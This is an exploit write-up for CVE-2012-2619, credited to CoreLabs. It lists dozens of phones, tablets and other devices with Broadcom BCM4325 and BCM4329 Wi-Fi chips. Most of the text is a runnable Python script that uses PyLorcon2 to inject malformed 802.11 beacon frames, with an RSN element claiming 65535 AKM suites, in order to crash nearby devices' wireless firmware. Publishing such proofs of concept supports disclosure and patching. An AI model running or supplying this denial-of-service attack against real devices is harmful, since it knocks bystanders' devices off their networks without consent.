
# Title : Broadcom DoS on BCM4325 and BCM4329 Devices
# Published : 2012-11-15
# Author :


# Exploit Author:
CoreLabs (Core Security Technologies); the issue was discovered by the
Argentine researcher Andrés Blanco.
# Vendor Homepage: 
# Software Link: [download link if available]
# Version: 1.0
# Tested on (devices with the BCM4325 chipset; the BCM4329 list follows below): 
Apple iPhone 3GS 
Apple iPod 2G 
HTC Touch Pro 2 
HTC Droid Incredible 
Samsung Spica 
Acer Liquid 
Motorola Devour 
Ford Edge (vehicle) 
Affected devices with the BCM4329 chipset: 
Apple iPhone 4 
Apple iPhone 4 Verizon 
Apple iPod 3G 
Apple iPad Wi-Fi 
Apple iPad 3G 
Apple iPad 2 
Apple Tv 2G 
Motorola Xoom 
Motorola Droid X2 
Motorola Atrix 
Samsung Galaxy Tab 
Samsung Galaxy S 4G 
Samsung Nexus S 
Samsung Stratosphere 
Samsung Fascinate 
HTC Nexus One 
HTC Evo 4G 
HTC ThunderBolt 
HTC Droid Incredible 2 
LG Revolution 
Sony Ericsson Xperia Play 
Pantech Breakout 
Nokia Lumina 800 
Kyocera Echo 
Asus Transformer Prime 
Malata ZPad

# CVE : CVE-2012-2619
#!/usr/bin/env python 

import sys 
import time 
import struct 
import PyLorcon2 

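def beaconFrameGenerator():
    """Yield malformed 802.11 beacon frames (one per ``next()`` call).

    Each frame advertises SSID "buggy" on channel 6 and carries an RSN IE
    whose AKM suite count is 0xFFFF even though the IE is only 20 bytes
    long and holds a single suite selector.  That deliberately
    inconsistent count is the malformed input this PoC relies on
    (presumably what the affected Broadcom firmware mishandles).  The
    12-bit sequence number is incremented per frame and wraps at 4096.

    Returns:
        A generator producing ``bytes`` objects: raw 802.11 MAC header plus
        frame body, without FCS, ready for raw injection.
    """
    sequence = 0
    while True:
        sequence %= 4096

        parts = [
            # --- MAC header ---
            b'\x80',                          # Frame Control: version 0, type Management, subtype Beacon
            b'\x00',                          # Flags: 0
            b'\x00\x00',                      # Duration: 0
            b'\xff\xff\xff\xff\xff\xff',      # Destination: broadcast
            b'\x00\x00\x00\x15\xde\xad',      # Source: 00:00:00:15:de:ad
            b'\x00\x00\x00\x15\xde\xad',      # BSSID: 00:00:00:15:de:ad
            # Sequence Control is little-endian: fragment number in bits 0-3
            # (always 0 here), sequence number in bits 4-15.  Explicit '<'
            # avoids native byte order / alignment.
            struct.pack('<H', sequence << 4),

            # --- Frame body ---
            # Timestamp: 64-bit TSF timer in microseconds, little-endian.
            # struct needs an int; packing the float from time.time() fails
            # on Python 3 and is deprecated on 2.7.
            struct.pack('<Q', int(time.time() * 1000000)),
            b'\x64\x00',                      # Beacon Interval: 100 TU = 0.1024 s
            b'\x11\x04',                      # Capability Information: ESS, Privacy, Short Slot Time

            # --- Information Elements ---
            b'\x00\x05buggy',                 # SSID: "buggy"
            b'\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c',  # Supported Rates: 1,2,5.5,11 (basic), 18,24,36,54
            b'\x03\x01\x06',                  # DS Parameter Set: channel 6

            # RSN IE (element ID 48, declared length 20)
            b'\x30',                          # Element ID: 48 (RSN)
            b'\x14',                          # Length: 20
            b'\x01\x00',                      # Version: 1
            b'\x00\x0f\xac\x04',              # Group cipher suite: 00-0F-AC:4 (CCMP)
            b'\x01\x00',                      # Pairwise cipher suite count: 1
            b'\x00\x0f\xac\x00',              # Pairwise cipher suite: 00-0F-AC:0 (use group cipher)
            b'\xff\xff',                      # AKM suite count: 65535 -- inconsistent with the 20-byte IE
            b'\x00\x0f\xac\x02',              # AKM suite: 00-0F-AC:2 (PSK); only this one is present
            b'\x00\x00',                      # RSN Capabilities: 0
        ]

        sequence += 1
        yield b''.join(parts)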

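if __name__ == "__main__":
    # Usage: <script> <wireless interface>
    # Parenthesised single-argument print works on both Python 2 and 3;
    # the usage line needs a real tab escape ("\t"), not the literal "t".
    if len(sys.argv) != 2:
        print("Usage:")
        print("\t%s <wireless interface>" % sys.argv[0])
        sys.exit(-1)

    iface = sys.argv[1]
    # Open the interface in injection + monitor mode through lorcon2.
    context = PyLorcon2.Context(iface)
    context.open_injmon()

    generator = beaconFrameGenerator()

    # Inject 10000 beacons, one every 100 ms (roughly 17 minutes in total).
    # next() instead of generator.next() so this also runs on Python 3.
    for _ in range(10000):
        frame = next(generator)
        time.sleep(0.100)
        context.send_bytes(frame)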